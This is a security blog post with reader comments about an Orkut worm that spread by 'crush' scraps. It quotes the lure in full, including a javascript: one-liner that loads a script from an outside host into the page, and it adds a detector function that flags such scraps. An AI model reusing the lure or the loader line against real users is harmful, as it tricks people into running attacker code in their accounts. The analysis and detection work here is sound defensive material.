web application security lab

Orkut “Crush” Worm

I’m a little behind the times, catching up on my email, but I thought I’d post this first since it’s probably some of the most interesting stuff. Keyshor just sent me an interesting snippet related to another Orkut worm that I’m affectionately calling “Crush” given the mode of transport, which is the Orkut crush. Here’s Keyshor’s email (cleaned up slightly):

This is the vulnerable scrap

Find out who has crush on u….
wait 4 few minutes after pressing enter
Author–> Coder http://www.orkut.com/Profile.aspx?uid=12437994075478369725>:)
Just copy the JavaScript, paste it in your address bar and PRESS ENTER

*javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://002292.googlepages.com/crush.js';void(0)*

Trust me, ITS WORKING!!!

The site is down now, but I threw up the JavaScript source in the list of XSS worms so people could check it out. I was able to pull another version that was still alive here. It also appears, judging by the headers, that it may at least at one point have been a Greasemonkey plugin, which is an interesting way to debug your DHTML malware, I suppose. Anyway, great snippet for those who want to do some more analysis.
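For anyone filtering user-posted text on the receiving end, here is an added example (not part of the original post or Keyshor's email) of a check that flags a scrap carrying a `javascript:` URI which injects a remote script, using the scrap quoted above as constructed sample input. The function and field names are hypothetical.

```javascript
// Added example (not the blog's code): flag user-posted text that carries a
// javascript: URI which injects a remote <script>. Names are hypothetical.

// Constructed sample: the scrap body as quoted in the post.
const SAMPLE_SCRAP = [
  "Find out who has crush on u....",
  "Just copy the JavaScript, paste it in your address bar and PRESS ENTER",
  "*javascript:d=document;c=d.createElement('script');d.body.appendChild(c);" +
    "c.src='http://002292.googlepages.com/crush.js';void(0)*",
].join("\n");

// URL parsers match the scheme case-insensitively and drop tabs/newlines.
const SCHEME = new RegExp(
  "javascript".split("").join("[\\t\\r\\n]*") + "[\\t\\r\\n]*:", "i");

function analyzeScrap(text) {
  // The body of a javascript: URL is percent-decoded before it runs, so decode
  // %xx escapes first; decoding one escape at a time never throws on a stray "%".
  const decoded = text.replace(/%([0-9a-f]{2})/gi,
    (_, hex) => String.fromCharCode(parseInt(hex, 16)));

  const m = SCHEME.exec(decoded);
  const payload = m ? decoded.slice(m.index + m[0].length) : "";

  // The two steps the scrap's one-liner performs: build a script element,
  // then point its src at another origin.
  const createsScript = /createElement\s*\(\s*['"]script['"]\s*\)/i.test(payload);
  const setsSrc = /\.src\s*=(?!=)/.test(payload) ||
    /setAttribute\s*\(\s*['"]src['"]/i.test(payload);

  // Hosts the payload would pull code from.
  const remoteHosts = [];
  for (const u of payload.match(/https?:\/\/[^\s'"<>)]+/gi) || []) {
    try { remoteHosts.push(new URL(u).hostname); } catch (e) { /* not a URL */ }
  }

  return {
    javascriptUri: Boolean(m),
    loadsRemoteScript: createsScript && setsSrc && remoteHosts.length > 0,
    pasteLure: /address\s*bar/i.test(decoded), // wording cue from the scrap
    remoteHosts,
  };
}

console.log(analyzeScrap(SAMPLE_SCRAP));
```

The `javascriptUri` flag alone also fires on harmless text such as "JavaScript: it is fun", so `loadsRemoteScript` is the field to act on.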

7 Responses to “Orkut “Crush” Worm”

  1. kuza55 Says:

    Now, I don’t know how successful this was, but I’m going to assume it hit a fair few people.

    So now we’ve finally reached the equivalent of those mass mailing worms where users have to download trojans; I honestly hope we don’t end up with an anti-javascript-virus solution which tries to match all the websites you view to common ‘malware’ such as this…

    On the other hand if these ever get prolific, I wouldn’t be surprised if we did…

    Protecting users from themselves seems to be the name of the game these days.

  2. sdsdsd Says:

    Viewing the XSS worm list makes Avast go insane. What’s going on? I’m going to have to use w3m to view that page. Agh. I’m on a work computer, thank god.

  3. Wladimir Palant Says:

    LOL
    This reminds me of that manual virus joke…

  4. Robert Says:

    Also available here:
    http://userscripts.org/scripts/review/23071?format=txt

  5. blah Says:

    “Just copy the JavaScript, paste it in your address bar and PRESS ENTER”… Since it’s in an XSS worms list, where is the XSS, may I ask?

  6. RSnake Says:

    @blah - funny, I thought you’d ask where the worm is, not where the XSS is, since the worm question is the only part that I think is pretty non-straightforward.

    The XSS part is where you type something into your browser which requests an inclusion of a script from another domain and pulls it into the DOM for the page in question, which in this case is Orkut. Now that we all understand what XSS is….

    I think this kind of XSS is pretty un-interesting in the same way I think Phishing is un-interesting but if people are still getting owned by it, it’s definitely worth mentioning, don’t you?

  7. Kyran Says:

    Hah!
    Please take a hammer and smash it into random parts of your computer, then proceed to mail me your credit card number. trust me, IT’S WORKING!